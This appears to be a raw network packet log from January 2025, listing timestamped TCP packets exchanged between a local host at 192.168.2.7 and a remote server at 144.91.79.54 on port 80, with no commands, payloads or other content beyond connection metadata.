                                    Jan 14, 2025 08:47:12.300936937 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.468036890 CET49677443192.168.2.720.50.201.200
                                    Jan 14, 2025 08:47:12.488275051 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.488329887 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.488367081 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.488398075 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.488403082 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.488437891 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.488447905 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.488472939 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.488507986 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.488518000 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.488545895 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.488590956 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.488708973 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.488743067 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.488780022 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.488789082 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.489151955 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.489187956 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.489212990 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.489223957 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.489253044 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.489263058 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.489655972 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.489721060 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.493479967 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.493515015 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.493552923 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.493552923 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.493583918 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.493627071 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.580754042 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.580827951 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.580864906 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.580902100 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.580914021 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.580936909 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.580955982 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.580971956 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.581007957 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.581017017 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.581042051 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.581077099 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.581084967 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.581110954 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.581146002 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.581182957 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.581192970 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.581322908 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.581634045 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.581671000 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.581706047 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.581724882 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.581741095 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.581774950 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.581809044 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.581820011 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.581845045 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.581857920 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.581881046 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.581947088 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.582490921 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.582525015 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.582561016 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.582572937 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.582628965 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.582664967 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.582679033 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.582699060 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.582735062 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.582745075 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.624294996 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.673048973 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.673122883 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.673160076 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.673173904 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.673196077 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.673232079 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.673247099 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.673266888 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.673301935 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.673346996 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.673355103 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.673391104 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.673405886 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.673424959 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.673460007 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.673469067 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.673496962 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.673531055 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.673547983 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.673563957 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.673602104 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.673618078 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.673851013 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.673886061 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.673903942 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.673923969 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.673958063 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.673985004 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.673994064 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.674027920 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.674076080 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.674391985 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.674424887 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.674446106 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.674480915 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.674514055 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.674530029 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.674550056 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.674582958 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.674597979 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.674618959 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.674653053 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.674686909 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.674700975 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.674722910 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.674730062 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.675492048 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.675525904 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.675546885 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.675561905 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.675595999 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.675609112 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.675630093 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.675662994 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.675693035 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.675698042 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.675733089 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.675749063 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.675767899 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.675803900 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.675823927 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.676234007 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.676280975 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.676290035 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.676312923 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.676331997 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.676348925 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.676364899 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.676364899 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.676395893 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.718029976 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.765212059 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.765283108 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.765337944 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.765343904 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.765391111 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.765427113 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.765458107 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.765484095 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.765491962 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.765508890 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.765527010 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.765564919 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.765600920 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.765611887 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.765665054 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.765667915 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.765717030 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.765752077 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.765767097 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.765789032 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.765824080 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.765841007 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.765858889 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.765897036 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.765934944 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.765934944 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.765969992 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.765985966 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.766005039 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.766048908 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.766057014 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.766108990 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.766143084 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.766158104 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.766177893 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.766212940 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.766226053 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.766247034 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.766283035 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.766293049 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.766315937 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.766349077 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.766385078 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.766385078 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.766433001 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.766779900 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.766814947 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.766849995 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.766865969 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.766881943 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.766917944 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.766952038 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.766963005 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.766987085 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.767019987 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.767036915 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.767054081 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.767070055 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.767086983 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.767122030 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.767132044 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.767155886 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.767191887 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.767198086 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.767225981 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.767261028 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.767272949 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.767613888 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.767647982 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.767666101 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.767683029 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.767735004 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.767743111 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.767771006 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.767803907 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.767819881 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.767838955 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.767873049 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.767911911 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.767935038 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.767950058 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.767983913 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.767993927 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.768017054 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.768040895 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.768050909 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.768085957 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.768096924 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.768121958 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.768170118 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.768661022 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.768695116 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.768735886 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.768740892 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.768786907 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.768822908 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.768836975 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.768856049 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.768892050 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.768904924 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.768927097 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.768961906 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.768995047 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.769012928 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.769028902 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.769036055 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.769062042 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.769095898 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.769114017 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.769129992 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.769165993 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.769174099 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.769503117 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.769596100 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.769629002 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.769721985 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.769757032 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.769766092 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.769790888 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.769826889 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.769838095 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.769860983 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.769895077 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.769907951 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.769931078 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.770032883 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.857743025 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.857808113 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.857841015 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.857861996 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.857887030 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.857942104 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.857976913 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.858001947 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.858031988 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.858041048 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.858091116 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.858140945 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.858160019 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.858176947 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.858216047 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.858226061 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.858253002 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.858287096 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.858305931 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.858338118 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.858371019 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.858402014 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.858406067 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.858438969 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.858488083 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.858498096 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.858549118 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.858555079 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.858591080 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.858623981 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.858658075 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.858686924 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.858690977 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.858720064 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.858720064 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.858753920 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.858787060 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.858798027 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.858822107 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.858836889 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.858855009 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.858889103 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.858900070 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.858922958 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.858957052 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.859002113 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.859009027 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.859041929 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.859076977 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.859095097 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.859111071 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.859129906 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.859143972 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.859179020 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.859189034 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.859215975 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.859251976 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.859263897 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.859286070 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.859327078 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.859338999 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.859373093 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.859415054 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.859452009 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.859464884 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.859518051 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.859527111 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.859551907 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.859586000 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.859618902 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.859632969 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.859652996 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.859666109 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.859687090 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.859724045 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.859730959 CET4970080192.168.2.7144.91.79.54
                                    Jan 14, 2025 08:47:12.859755993 CET8049700144.91.79.54192.168.2.7
                                    Jan 14, 2025 08:47:12.859790087 CET8049700144.91.79.54192.168.2.7
